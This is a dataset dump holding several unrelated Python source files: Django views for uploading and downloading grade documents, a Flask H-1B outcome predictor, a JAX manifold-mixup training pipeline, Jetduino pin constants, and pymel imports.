content stringlengths 5 1.05M |
|---|
from django.shortcuts import get_object_or_404, render, redirect
from django.db.models import Prefetch
from django.contrib import messages
from django.conf import settings
from django.utils.translation import ugettext as _
from django.http import HttpResponseBadRequest, HttpResponseForbidden
from sendfile import sendfile
from evap.evaluation.auth import grade_publisher_required, grade_downloader_required, grade_publisher_or_staff_required
from evap.evaluation.models import Semester, Contribution, Course
from evap.grades.models import GradeDocument
from evap.grades.forms import GradeDocumentForm
from evap.evaluation.tools import send_publish_notifications
@grade_publisher_required
def index(request):
    """Landing page for grade publishers: lists every semester."""
    context = {'semesters': Semester.objects.all()}
    return render(request, "grades_index.html", context)
def prefetch_data(courses):
    """Attach responsible contributors and grade-document counts to courses.

    Args:
        courses: a Course queryset.

    Returns:
        A list of ``(course, midterm_grade_count, final_grade_count)`` tuples,
        where each course additionally carries a ``responsible_contributor``
        attribute.
    """
    courses = courses.prefetch_related(
        Prefetch("contributions",
                 queryset=Contribution.objects.filter(responsible=True).select_related("contributor"),
                 to_attr="responsible_contribution"),
        "degrees",
        # Prefetching the documents lets us count in Python and avoids two
        # extra COUNT queries per course (previously an N+1 pattern).
        "grade_documents")

    course_data = []
    for course in courses:
        course.responsible_contributor = course.responsible_contribution[0].contributor
        grade_documents = course.grade_documents.all()
        course_data.append((
            course,
            sum(1 for document in grade_documents if document.type == GradeDocument.MIDTERM_GRADES),
            sum(1 for document in grade_documents if document.type == GradeDocument.FINAL_GRADES),
        ))
    return course_data
@grade_publisher_required
def semester_view(request, semester_id):
    """Overview of all graded, non-new courses of one semester."""
    semester = get_object_or_404(Semester, id=semester_id)

    graded_courses = semester.course_set.filter(is_graded=True).exclude(state='new')
    course_data = prefetch_data(graded_courses)

    context = {
        'semester': semester,
        'courses': course_data,
        'disable_if_archived': "disabled=disabled" if semester.is_archived else "",
        'disable_breadcrumb_semester': True,
    }
    return render(request, "grades_semester_view.html", context)
@grade_publisher_or_staff_required
def course_view(request, semester_id, course_id):
    """Detail page listing every grade document of a single course."""
    semester = get_object_or_404(Semester, id=semester_id)
    course = get_object_or_404(Course, id=course_id)

    context = {
        'semester': semester,
        'course': course,
        'grade_documents': course.grade_documents.all(),
        'disable_if_archived': "disabled=disabled" if semester.is_archived else "",
        'disable_breadcrumb_course': True,
        'is_grade_publisher': request.user.is_grade_publisher,
    }
    return render(request, "grades_course_view.html", context)
@grade_publisher_required
def upload_grades(request, semester_id, course_id):
    """Upload a midterm or final grade document for a course.

    The ``final`` GET parameter selects final grades (default: midterm).
    Uploading final grades for a reviewed course also publishes the course
    and triggers the corresponding notifications.
    """
    semester = get_object_or_404(Semester, id=semester_id)
    course = get_object_or_404(Course, id=course_id)

    # Convert the GET parameter to a boolean; anything but 'true'/'false'
    # yields None, which is treated like the midterm default.
    final_grades = {'true': True, 'false': False}.get(request.GET.get('final', 'false').lower())

    grade_document = GradeDocument(course=course)
    if final_grades:
        grade_document.type = GradeDocument.FINAL_GRADES
        grade_document.description = settings.DEFAULT_FINAL_GRADES_DESCRIPTION
    else:
        grade_document.type = GradeDocument.MIDTERM_GRADES
        grade_document.description = settings.DEFAULT_MIDTERM_GRADES_DESCRIPTION

    form = GradeDocumentForm(request.POST or None, request.FILES or None, instance=grade_document)

    if not form.is_valid():
        context = {
            'semester': semester,
            'course': course,
            'form': form,
            'final_grades': final_grades,
            'show_automated_publishing_info': final_grades,
        }
        return render(request, "grades_upload_form.html", context)

    form.save(modifying_user=request.user)

    # Final grades for a reviewed course publish the course as a side effect.
    if final_grades and course.state == 'reviewed':
        course.publish()
        course.save()
        send_publish_notifications(grade_document_courses=[course], evaluation_results_courses=[course])
    else:
        send_publish_notifications(grade_document_courses=[course])

    messages.success(request, _("Successfully uploaded grades."))
    return redirect('grades:course_view', semester.id, course.id)
@grade_publisher_required
def toggle_no_grades(request, semester_id, course_id):
    """Toggle whether a course is expected to provide grade documents."""
    semester = get_object_or_404(Semester, id=semester_id)
    course = get_object_or_404(Course, id=course_id)

    if request.method != 'POST':
        # Confirmation page before toggling.
        context = {'semester': semester, 'course': course}
        return render(request, "toggle_no_grades.html", context)

    course.gets_no_grade_documents = not course.gets_no_grade_documents
    course.save()

    if course.gets_no_grade_documents:
        # A reviewed course with no pending grade documents can be published.
        if course.state == 'reviewed':
            course.publish()
            course.save()
            send_publish_notifications(evaluation_results_courses=[course])
        messages.success(request, _("Successfully confirmed that no grade documents will be provided."))
    else:
        messages.success(request, _("Successfully confirmed that grade documents will be provided later on."))
    return redirect('grades:semester_view', semester_id)
@grade_downloader_required
def download_grades(request, grade_document_id):
    """Serve a grade document as a file download; GET requests only."""
    if request.method != "GET":
        return HttpResponseBadRequest()

    grade_document = get_object_or_404(GradeDocument, id=grade_document_id)
    return sendfile(request, grade_document.file.path, attachment=True,
                    attachment_filename=grade_document.filename())
@grade_publisher_required
def edit_grades(request, semester_id, course_id, grade_document_id):
    """Edit an existing grade document of a course."""
    semester = get_object_or_404(Semester, id=semester_id)
    course = get_object_or_404(Course, id=course_id)
    grade_document = get_object_or_404(GradeDocument, id=grade_document_id)

    form = GradeDocumentForm(request.POST or None, request.FILES or None, instance=grade_document)

    if not form.is_valid():
        context = {
            'semester': semester,
            'course': course,
            'form': form,
            'show_automated_publishing_info': False,
        }
        return render(request, "grades_upload_form.html", context)

    form.save(modifying_user=request.user)
    messages.success(request, _("Successfully updated grades."))
    return redirect('grades:course_view', semester.id, course.id)
@grade_publisher_required
def delete_grades(request, semester_id, course_id, grade_document_id):
    """Delete a grade document after a POST confirmation."""
    semester = get_object_or_404(Semester, id=semester_id)
    course = get_object_or_404(Course, id=course_id)
    grade_document = get_object_or_404(GradeDocument, id=grade_document_id)

    if request.method != 'POST':
        # Confirmation page before deleting.
        context = {
            'semester': semester,
            'course': course,
            'grade_document': grade_document,
        }
        return render(request, "grades_delete.html", context)

    grade_document.delete()
    messages.success(request, _("Successfully deleted grade document."))
    return redirect('grades:course_view', semester_id, course_id)
|
#Importing the required packages
from flask import Flask, render_template, request
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings('ignore')
from sklearn.linear_model import LogisticRegression
app = Flask(__name__)
# Initial home page.
@app.route('/')
def home():
    """Render the landing page."""
    return render_template('home.html')
# Page shown when "Attribute Entry" is selected.
@app.route('/attribute_entry')
def attribute_entry():
    """Render the attribute-entry form."""
    return render_template('attribute_entry.html')
# Obtaining values from attribute entry and processing them.
@app.route('/yes', methods=['GET', 'POST'])
def yes():
    """Predict an H-1B case outcome from the submitted attribute form.

    Reads the categorical form fields, one-hot encodes them in the exact
    column order produced by ``pd.get_dummies`` on the training frame, fits a
    logistic regression on ``train.csv`` and renders the prediction together
    with a confidence percentage.

    Replaces ~350 lines of hand-written ``if`` chains (which also contained
    duplicated initializations and dead assignments such as ``soc_14``,
    ``soc_30``, ``soc_42`` that never reached the feature vector) with a
    table-driven encoding that yields the identical feature vector.
    """
    def one_hot(value, codes):
        # 1 for the matching category, 0 elsewhere (all zeros if no match).
        return [1 if value == code else 0 for code in codes]

    # Values from the HTML form.
    ftp = request.form['FULL_TIME_POSITION']
    pwl = request.form['PW_WAGE_LEVEL']
    pws = request.form['PW_SOURCE']
    agc = request.form['AGENT_ATTORNEY_CITY_BIN']
    empn = request.form['EMPLOYER_NAME_BIN']
    emps = request.form['EMPLOYER_STATE_BIN']
    soc = request.form['SOC_REVISED_CODE']

    # The training matrix contains two overlapping groups of SOC code columns
    # (an artifact of the original dummy encoding), so the same code appears
    # twice in the feature vector. The duplication is intentional and must be
    # preserved to keep the column count/order aligned with the trained model.
    soc_codes_a = ['10', '11', '12', '13', '15', '16', '17', '18', '19', '20',
                   '21', '22', '23', '24', '25', '26', '27', '29', '31', '33',
                   '35', '36', '37', '38', '39', '40', '41', '43', '45', '46',
                   '47', '49', '51', '53', '71', '73', '74']
    soc_codes_b = ['11', '13', '15', '16', '17', '18', '19', '20', '21', '23',
                   '25', '27', '28', '29', '31', '33', '35', '36', '37', '39',
                   '40', '41', '43', '45', '47', '49', '50', '51', '53', '71',
                   '73', '75', '79', 'AC', 'AI', 'CO', 'EL', 'SO']

    # Feature vector in the exact order of the original test_list.
    test_list = (
        one_hot(empn, ['Bin1', 'Bin2', 'Bin3', 'Bin4', 'Bin5', 'Others'])
        + one_hot(agc, ['Bin1', 'Bin2', 'Bin3', 'Bin4', 'Bin5', 'None', 'Others'])
        + one_hot(pwl, ['Level I', 'Level II', 'Level III', 'Level IV'])
        + one_hot(soc, soc_codes_a)
        + one_hot(soc, soc_codes_b)
        + one_hot(pws, ['CBA', 'DBA', 'OES', 'Other', 'SCA'])
        + one_hot(emps, ['Bin1', 'Bin2', 'Bin3', 'Bin4', 'Bin5', 'Bin6', 'Bin7', 'Others'])
        + one_hot(ftp, ['N', 'Y'])
    )

    # Training data: drop identifier and unused columns, then one-hot encode
    # the remaining categorical features.
    df = pd.read_csv('train.csv')
    train = df.drop(['Unnamed: 0', 'WORKSITE_STATE', 'WORKSITE_COUNTY_BIN',
                     'AGENT_ATTORNEY_STATE_BIN', 'AMENDED_PETITION_BIN',
                     'AGENT_REPRESENTING_EMPLOYER',
                     'NEW_EMPLOYMENT_BIN', 'CHANGE_PREVIOUS_EMPLOYMENT_BIN'], axis=1)
    train = train.drop(train.iloc[:, 1:5], axis=1)
    train = train.drop(['Target', 'WAGE_UNIT_OF_PAY'], axis=1)
    trainX = np.asarray(pd.get_dummies(train))
    trainY = np.asarray(df['Target'])

    # NOTE(review): the model is re-trained on every request; caching the
    # fitted model at module level would avoid the repeated cost, but that
    # would change module import side effects, so it is left as-is here.
    lr = LogisticRegression(solver='lbfgs')
    lr.fit(trainX, trainY)

    testX = np.asarray(pd.DataFrame([test_list]))

    # Decision threshold on the probability of class 1 ("denied").
    THRESHOLD = 0.015
    yhat = np.where(lr.predict_proba(testX)[:, 1] > THRESHOLD, 1, 0)

    # Confidence: highest class probability, as a rounded percentage.
    ci = lr.predict_proba(testX).max()
    ci *= 100
    ci = round(ci, 2)

    disp = 'DENIED' if yhat == 1 else 'ACCEPTED'
    return render_template('yes.html', value=disp, value1=ci)
@app.route('/insights', methods=['GET'])
def insights():
    """Render the insights page."""
    return render_template('insights.html')
# Start the Flask development server when this module is run directly.
if __name__ == '__main__':
    app.run()
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""training pipeline for multi environment manifold mixup."""
import functools
import time
from flax.deprecated import nn
import jax
import jax.numpy as jnp
from gift.pipelines import multi_env_end2end
from gift.pipelines import pipeline_utils
from gift.utils import tensor_util
class MultiEnvManifoldMixup(multi_env_end2end.MultiEnvReps2Reps):
  """Training pipeline for multiple environments using manifold mixup."""

  def setup_pmapped_tain_and_eval_steps(self):
    """Builds the pmapped train / eval / forward-pass step functions.

    NOTE(review): 'tain' looks like a typo for 'train', but the name is kept
    because the base class and callers may reference it.
    """
    # Environment ids for evaluation come from the validation iterators.
    eval_env_ids = list(
        map(int, self.task.dataset.data_iters.validation.keys()))
    train_env_ids, _ = list(
        zip(*dict(self.task.dataset.data_iters['train']).items()))
    train_env_ids = list(map(int, train_env_ids))
    self.p_train_step = functools.partial(
        self.train_step, env_ids=train_env_ids)
    # sampled_layer (positional argument 2 after partial binding) is a Python
    # string, hence statically broadcast; donated arguments let XLA reuse the
    # input buffers of train_state and batch.
    self.pmapped_train_step = jax.pmap(
        self.p_train_step,
        axis_name='batch',
        in_axes=(0, 0),
        static_broadcasted_argnums=(2,),
        donate_argnums=(0, 1))
    self.p_eval_step = functools.partial(
        self.eval_step, all_env_ids=eval_env_ids)
    self.pmapped_eval_step = jax.pmap(
        self.p_eval_step,
        axis_name='batch',
        in_axes=(0, 0),
        static_broadcasted_argnums=(2,))
    self.pmapped_forward_pass = jax.pmap(
        self.forward_pass, axis_name='batch', in_axes=(0, 0, 0, 0))

  def training_loss_fn(self, flax_model, train_state, batch, dropout_rng,
                       env_ids, sampled_layer):
    """Runs forward pass and computes loss.

    Args:
      flax_model: A flax module.
      train_state: TrainState, the state of training including the current
        global_step, model_state, rng, and optimizer.
      batch: Batches from different environments.
      dropout_rng: FLAX PRNG key.
      env_ids: list[int]; List of env codes.
      sampled_layer: str; Name of the layer on which mixup is applied.

    Returns:
      loss, new_module_state and computed logits for each batch.
    """
    dropout_rng, new_rng = jax.random.split(dropout_rng)
    with nn.stochastic(dropout_rng):
      # Run student forward pass:
      (all_env_reps, env_logits, selected_env_reps,
       train_state) = self.stateful_forward_pass(flax_model, train_state, batch)
      new_model_state = train_state.model_state

    # Activations of the layer that mixup is applied to.
    sampled_reps = all_env_reps[sampled_layer]
    # Vectorized over (rng, matching matrix, reps, reps); the scalar lambda
    # sampling parameters are broadcast.
    interpolate_fn = jax.vmap(
        pipeline_utils.interpolate,
        in_axes=(0, 0, 0, 0, None, None, None, None))

    interpolate_rng, new_rng = jax.random.split(new_rng)
    with nn.stochastic(interpolate_rng):
      # Mixup across pairs of different environments (if enabled):
      (interpolated_batches, interpolated_logits, sampled_lambdas,
       train_state) = self.maybe_inter_env_interpolation(
           batch, env_ids, flax_model, interpolate_fn, sampled_layer,
           sampled_reps, selected_env_reps, train_state)

      # Mixup within each single environment (if enabled):
      (same_env_interpolated_batches, same_env_interpolated_logits, _,
       train_state) = self.maybe_intra_env_interpolation(
           batch, env_ids, flax_model, interpolate_fn, sampled_layer,
           sampled_reps, train_state)

    loss_rng, new_rng = jax.random.split(new_rng)
    with nn.stochastic(loss_rng):
      # Compute the total loss (inside nn.stochastic):
      loss = self.task.loss_function(env_logits, selected_env_reps, batch,
                                     env_ids, flax_model.params,
                                     train_state.global_step)

      # Add the loss for cross environment interpolated states:
      if len(env_ids) > 1 and self.hparams.get('inter_env_interpolation', True):
        inter_mixup_factor = self.hparams.get('inter_mixup_factor', 1.0)
        loss += self.task.loss_function(
            interpolated_logits, None, interpolated_batches, None, None,
            train_state.global_step) * inter_mixup_factor

      # Add the loss for same environment interpolated states:
      if self.hparams.get('intra_env_interpolation', True):
        intra_mixup_factor = self.hparams.get('intra_mixup_factor', 1.0)
        loss += self.task.loss_function(
            same_env_interpolated_logits, None, same_env_interpolated_batches,
            None, None, train_state.global_step) * intra_mixup_factor

    logs = {'sampled_lambdas': sampled_lambdas}
    return loss, (new_model_state, env_logits, logs)

  # TODO(samiraabnar): Try to avoid code duplication when overriding this fn.
  def train_step(self, train_state, batch, env_ids, sampled_layer):
    """Runs a single step of training.

    Given the state of the training and a batch of data, computes
    the loss and updates the parameters of the model.

    Args:
      train_state: TrainState, the state of training including the current
        global_step, model_state, rng, and optimizer.
      batch: A single batch of data.
      env_ids: list(int): List of training environments codes.
      sampled_layer: str; Name of the layer on which mixup is applied.

    Returns:
      Updated state of training and calculated metrics.
    """
    max_grad_norm = self.hparams.get('max_grad_norm', None)
    new_rng, rng = jax.random.split(train_state.rng)

    # bind the rng to the host/device we are on.
    dropout_rng = pipeline_utils.bind_rng_to_host_device(
        rng, axis_name='batch', bind_to=['host', 'device'])

    # Bind everything but the differentiated model parameters.
    train_loss_fn = functools.partial(
        self.training_loss_fn,
        train_state=train_state,
        batch=batch,
        dropout_rng=dropout_rng,
        env_ids=env_ids,
        sampled_layer=sampled_layer)

    new_train_state, metrics = self.compute_grads_and_update(
        batch, env_ids, max_grad_norm, new_rng, train_loss_fn, train_state)

    return new_train_state, metrics

  def train(self):
    """Training loop."""
    master = jax.host_id() == 0

    train_metrics = []
    train_summary, eval_summary = None, None
    tick = time.time()
    eval_env_ids = list(
        map(int, self.task.dataset.data_iters.validation.keys()))
    train_env_ids, train_iters = list(
        zip(*dict(self.task.dataset.data_iters['train']).items()))
    train_env_ids = list(map(int, train_env_ids))

    # Prepare arguments for layer sampling:
    # A single forward pass on one sample batch exposes the available layer
    # representations, from which the mixup candidate layers are derived.
    sample_batch = self.get_next_batch(train_iters)
    _, all_env_reps, _, _ = self.pmapped_forward_pass(
        self.train_state.optimizer.target, self.train_state, sample_batch,
        self.train_state.rng)
    layer_keys, mixup_layers = pipeline_utils.get_sample_layer_params(
        self.hparams, all_env_reps)

    # Train loop:
    for step in range(self.start_step + 1, self.total_steps + 1):
      train_batches = self.get_next_batch(train_iters)
      # A (possibly different) layer is sampled for mixup at every step.
      sampled_layer = pipeline_utils.sample_layer(
          layer_keys, mixup_layers=mixup_layers)

      self.train_state, t_metrics = self.pmapped_train_step(
          self.train_state, train_batches, train_env_ids, sampled_layer)
      # Metrics are replicated across devices; keep the first replica.
      t_metrics = jax.tree_map(lambda x: x[0], t_metrics)
      train_metrics.append(t_metrics)

      (eval_summary, train_metrics, train_summary,
       tick) = self.maybe_eval_and_log(eval_env_ids, eval_summary, master, step,
                                       tick, train_metrics, train_summary)

      # Sync and save
      self.checkpoint(self.train_state, step)

    # wait until computations are done before exiting (for timing!)
    jax.random.normal(jax.random.PRNGKey(0), ()).block_until_ready()

    # return the train and eval summary after last step for regression testing
    return train_summary, eval_summary

  def maybe_intra_env_interpolation(self, batch, env_ids, flax_model,
                                    interpolate_fn, sampled_layer, sampled_reps,
                                    train_state):
    """Applies mixup between examples of the same environment, if enabled.

    Returns (interpolated_batches, interpolated_logits, sample_lambdas,
    train_state); when disabled returns (None, None, 0, train_state).
    """
    if self.hparams.get('intra_env_interpolation', True):
      # Set alpha and beta for sampling lambda:
      beta_params = pipeline_utils.get_weight_param(self.hparams, 'beta', 1.0)
      alpha_params = pipeline_utils.get_weight_param(self.hparams, 'alpha', 1.0)
      step = train_state.global_step
      beta = pipeline_utils.scheduler(step, beta_params)
      alpha = pipeline_utils.scheduler(step, alpha_params)

      # This is just a random matching (similar to manifold mixup paper).
      self_aligned_matching_matrix, self_pair_ids = self.get_intra_env_matchings(
          batch, sampled_reps, env_ids)

      # Compute interpolated representations of sampled layer:
      same_env_inter_reps, sample_lambdas = interpolate_fn(
          jax.random.split(nn.make_rng(), len(sampled_reps)),
          self_aligned_matching_matrix, sampled_reps, sampled_reps,
          self.hparams.get('num_of_lambdas_samples_for_mixup',
                           1), alpha, beta, -1)

      # Get interpolated batches (interpolated inputs, labels, and weights)
      same_env_interpolated_batches = self.get_interpolated_batches(
          batch, same_env_inter_reps, self_pair_ids, sample_lambdas,
          self.hparams.get('intra_interpolation_method',
                           'plain_convex_combination'))
      if self.hparams.get('stop_grad_for_intra_mixup', True):
        same_env_interpolated_batches = jax.lax.stop_gradient(
            same_env_interpolated_batches)

      # Compute logits for the interpolated states:
      # NOTE(review): sampled_layer is passed as `input_key` here — presumably
      # the forward pass resumes from the sampled layer's representations;
      # confirm against the forward_pass implementation.
      (_, same_env_interpolated_logits, _,
       train_state) = self.stateful_forward_pass(flax_model, train_state,
                                                 same_env_interpolated_batches,
                                                 sampled_layer)

      return (same_env_interpolated_batches, same_env_interpolated_logits,
              sample_lambdas, train_state)

    return None, None, 0, train_state

  def maybe_inter_env_interpolation(self, batch, env_ids, flax_model,
                                    interpolate_fn, sampled_layer, sampled_reps,
                                    selected_env_reps, train_state):
    """Applies mixup between examples of different environments, if enabled.

    Requires at least two environments. Returns (interpolated_batches,
    interpolated_logits, sample_lambdas, train_state); when disabled returns
    (None, None, 0, train_state).
    """
    if len(env_ids) > 1 and self.hparams.get('inter_env_interpolation', True):
      # We call the alignment method of the task class:
      aligned_pairs = self.task.get_env_aligned_pairs_idx(
          selected_env_reps, batch, env_ids)
      pair_keys, alignments = zip(*aligned_pairs.items())

      # Convert alignments which is the array of aligned indices to match mat.
      alignments = jnp.asarray(alignments)
      num_env_pairs = alignments.shape[0]
      batch_size = alignments.shape[2]
      matching_matrix = jnp.zeros(
          shape=(num_env_pairs, batch_size, batch_size), dtype=jnp.float32)
      matching_matrix = matching_matrix.at[:, alignments[:, 0],
                                           alignments[:, 1]].set(1.0)

      # Convert pair keys to pair ids (indices in the env_ids list).
      pair_ids = [(env_ids.index(int(x[0])), env_ids.index(int(x[1])))
                  for x in pair_keys]

      # Get sampled layer activations and group them similar to env pairs.
      paired_reps = jnp.array([
          (sampled_reps[envs[0]], sampled_reps[envs[1]]) for envs in pair_ids
      ])

      # Set alpha and beta for sampling lambda:
      beta_params = pipeline_utils.get_weight_param(self.hparams, 'inter_beta',
                                                    1.0)
      alpha_params = pipeline_utils.get_weight_param(self.hparams,
                                                     'inter_alpha', 1.0)
      beta = pipeline_utils.scheduler(train_state.global_step, beta_params)
      alpha = pipeline_utils.scheduler(train_state.global_step, alpha_params)

      # Get interpolated reps for each env pair:
      inter_reps, sample_lambdas = interpolate_fn(
          jax.random.split(nn.make_rng(), len(paired_reps[:, 0])),
          matching_matrix, paired_reps[:, 0], paired_reps[:, 1],
          self.hparams.get('num_of_lambdas_samples_for_inter_mixup',
                           1), alpha, beta, -1)

      # Get interpolated batches for each env pair:
      # NOTE(review): this reads the 'intra_interpolation_method' hparam even
      # though it is on the inter-env path — possibly intentional sharing,
      # possibly a copy-paste slip; confirm before relying on it.
      interpolated_batches = self.get_interpolated_batches(
          batch, inter_reps, pair_ids, sample_lambdas,
          self.hparams.get('intra_interpolation_method',
                           'plain_convex_combination'))
      if self.hparams.get('stop_grad_for_inter_mixup', True):
        interpolated_batches = jax.lax.stop_gradient(interpolated_batches)

      # Compute logits for the interpolated states:
      _, interpolated_logits, _, train_state = self.stateful_forward_pass(
          flax_model, train_state, interpolated_batches, sampled_layer)

      return (interpolated_batches, interpolated_logits, sample_lambdas,
              train_state)

    return None, None, 0, train_state

  def get_intra_env_matchings(self, batch, reps, env_ids):
    """This functions returns alignment for matching example of single envs.

    For now, this is only returning random permutations.

    Args:
      batch: list(dict); List of environment batches.
      reps: list(jnp array); representations of a selected layer for each env
        batch.
      env_ids: list(int); list of environment ids.

    Returns:
      self_aligned_matching_matrix, self_pair_ids
    """
    self_aligned_matching_matrix = []
    self_pair_ids = []
    for env_id, env_batch, env_reps in zip(env_ids, batch, reps):
      self_aligned_matching_matrix.append(
          pipeline_utils.get_self_matching_matrix(
              env_batch,
              env_reps,
              mode=self.hparams.get('intra_mixup_mode', 'random'),
              label_cost=self.hparams.get('intra_mixup_label_cost', 1.0),
              l2_cost=self.hparams.get('intra_mixup_l2_cost', 0.001)))
      # Each environment is paired with itself.
      self_pair_ids.append((env_ids.index(env_id), env_ids.index(env_id)))

    self_aligned_matching_matrix = jnp.array(self_aligned_matching_matrix)
    return self_aligned_matching_matrix, self_pair_ids

  def get_interpolated_batches(self,
                               batch,
                               new_reps,
                               pair_ids,
                               sample_lambdas,
                               interpolation_method='plain_convex_combination'):
    """Builds batch dicts for interpolated examples.

    Labels (and weights, if present) are convex-combined per pair; env_name is
    copied from the first batch of each pair; inputs are the interpolated
    representations.

    Returns a list of batch dicts, one per pair in `pair_ids`.
    """
    interpolated_batch_keys = []
    keys = []

    # Batch keys that should be interpolated:
    key = 'label'
    paired_batch_keys = jnp.array([
        (batch[x[0]][key], batch[x[1]][key]) for x in pair_ids
    ])
    if interpolation_method == 'plain_convex_combination':
      interpolated_batch_keys.append(
          jax.vmap(tensor_util.convex_interpolate)(paired_batch_keys[:, 0],
                                                   paired_batch_keys[:, 1],
                                                   sample_lambdas))
    else:
      # If the interpolation method is wasserstein or something else, we will
      # assuming the interpolation is label preserving, hence use the label of
      # of the source examples.
      interpolated_batch_keys.append(paired_batch_keys[:, 0])
    keys.append(key)

    # If batch has weights attribute:
    if batch[0].get('weights') is not None:
      key = 'weights'
      paired_batch_keys = jnp.array([
          (batch[x[0]][key], batch[x[1]][key]) for x in pair_ids
      ])
      interpolated_batch_keys.append(
          jax.vmap(tensor_util.convex_interpolate)(paired_batch_keys[:, 0],
                                                   paired_batch_keys[:, 1],
                                                   sample_lambdas))
      keys.append(key)

    # Set env_name to the env_name of first batch:
    key = 'env_name'
    paired_batch_keys = jnp.array(
        list(map(lambda x: (batch[x[0]][key], batch[x[1]][key]), pair_ids)))
    interpolated_batch_keys.append(paired_batch_keys[:, 0])
    keys.append(key)

    # Set inputs to interpolated reps:
    key = 'inputs'
    interpolated_batch_keys.append(new_reps)
    keys.append(key)

    # Assemble one dict per pair from the collected per-key arrays.
    interpolated_batches = []
    for j in range(len(pair_ids)):
      new_batch = {}
      for i in range(len(keys)):
        new_batch[keys[i]] = interpolated_batch_keys[i][j]
      interpolated_batches.append(new_batch)

    return interpolated_batches

  def stateful_forward_pass(self,
                            flax_model,
                            train_state,
                            batch,
                            input_key='input',
                            train=True):
    """Forward pass that also folds the new model state into train_state.

    Must be called inside an nn.stochastic scope (uses nn.make_rng()).
    """
    (env_logits, all_env_reps, selected_env_reps,
     new_model_state) = self.forward_pass(flax_model, train_state, batch,
                                          nn.make_rng(), input_key, train)
    # Model state, e.g. batch statistics, are averaged over all environments
    # because we use vmapped_flax_module_train.
    new_model_state = jax.tree_util.tree_map(
        functools.partial(jnp.mean, axis=0), new_model_state)
    # Update the model state already, since there is going to be another forward
    # pass.
    train_state = train_state.replace(model_state=new_model_state)
    return all_env_reps, env_logits, selected_env_reps, train_state
|
#!/usr/bin/env python
#
# Jetduino Python library
# v1.0.0
#
# This file provides the basic mappings of the pins for the arduino and jetson for use with the Jetduino
#
# The Jetduino connects the Jetson and Grove sensors. You can learn more about the Jetduino here: http://www.NeuroRoboticTech.com/Projects/Jetduino
#
# Have a question about this example? Ask on the forums here: http://www.NeuroRoboticTech.com/Forum
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Jetduino for the Jetson TK1/TX1: an open source platform for connecting
Grove Sensors to the Jetson embedded supercomputers.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
# You can find the original Due pin mappings in this file on Windows:
# C:\Users\your_user_id\AppData\Local\Arduino15\packages\arduino\hardware\sam\1.6.6\variants\arduino_due_x\pins_arduino.h
# Arduino digital pins D0-D53.
ARD_D0 = 0
ARD_D1 = 1
ARD_D2 = 2
ARD_D3 = 3
ARD_D4 = 4
ARD_D5 = 5
ARD_D6 = 6
ARD_D7 = 7
ARD_D8 = 8
ARD_D9 = 9
ARD_D10 = 10
ARD_D11 = 11
ARD_D12 = 12
ARD_D13 = 13
ARD_D14 = 14
ARD_D15 = 15
ARD_D16 = 16
ARD_D17 = 17
ARD_D18 = 18
ARD_D19 = 19
ARD_D20 = 20
ARD_D21 = 21
ARD_D22 = 22
ARD_D23 = 23
ARD_D24 = 24
ARD_D25 = 25
ARD_D26 = 26
ARD_D27 = 27
ARD_D28 = 28
ARD_D29 = 29
ARD_D30 = 30
ARD_D31 = 31
ARD_D32 = 32
ARD_D33 = 33
ARD_D34 = 34
ARD_D35 = 35
ARD_D36 = 36
ARD_D37 = 37
ARD_D38 = 38
ARD_D39 = 39
ARD_D40 = 40
ARD_D41 = 41
ARD_D42 = 42
ARD_D43 = 43
ARD_D44 = 44
ARD_D45 = 45
ARD_D46 = 46
ARD_D47 = 47
ARD_D48 = 48
ARD_D49 = 49
ARD_D50 = 50
ARD_D51 = 51
ARD_D52 = 52
ARD_D53 = 53
# Arduino analog pins; numbering continues after the digital pins (A0 = 54).
ARD_A0 = 54
ARD_A1 = 55
ARD_A2 = 56
ARD_A3 = 57
ARD_A4 = 58
ARD_A5 = 59
ARD_A6 = 60
ARD_A7 = 61
ARD_A8 = 62
ARD_A9 = 63
ARD_A10 = 64
ARD_A11 = 65
ARD_A12 = 66
ARD_A13 = 67
ARD_A14 = 68
ARD_A15 = 69
# DAC outputs.
# NOTE(review): these values collide with ARD_A12/ARD_A13 above (66/67).
# On the Arduino Due the DAC pins do occupy 66/67 and analog pins stop at
# A11 — confirm whether A12-A15 are meaningful for the target board.
ARD_DAC0 = 66
ARD_DAC1 = 67
# Jetson analog channels.
JET_A0 = 100
JET_A1 = 101
JET_A2 = 102
JET_A3 = 103
# This one has been increased by 100 to make
# it outside the range of the arduino pins.
JET_PH1 = 157
# Jetson GPIO pins (named after the Tegra GPIO ports, e.g. PK1, PU0).
JET_PK1 = 81
JET_PK2 = 82
JET_PK4 = 84
JET_PU0 = 160
JET_PU1 = 161
JET_PU2 = 162
JET_PU3 = 163
JET_PU4 = 164
JET_PU5 = 165
JET_PU6 = 166
# Pin direction constants (pinMode-style).
OUTPUT_PIN = 1
INPUT_PIN = 0
# Digital logic levels.
HIGH = 1
LOW = 0
# Motor rotation direction constants.
CLOCKWISE = 1
COUNTER_CLOCKWISE = 0
|
import sys
import re
import pymel.util as _util
import pymel.internal.pmcmds as cmds
import pymel.internal.factories as _factories
import pymel.internal.startup as _startup
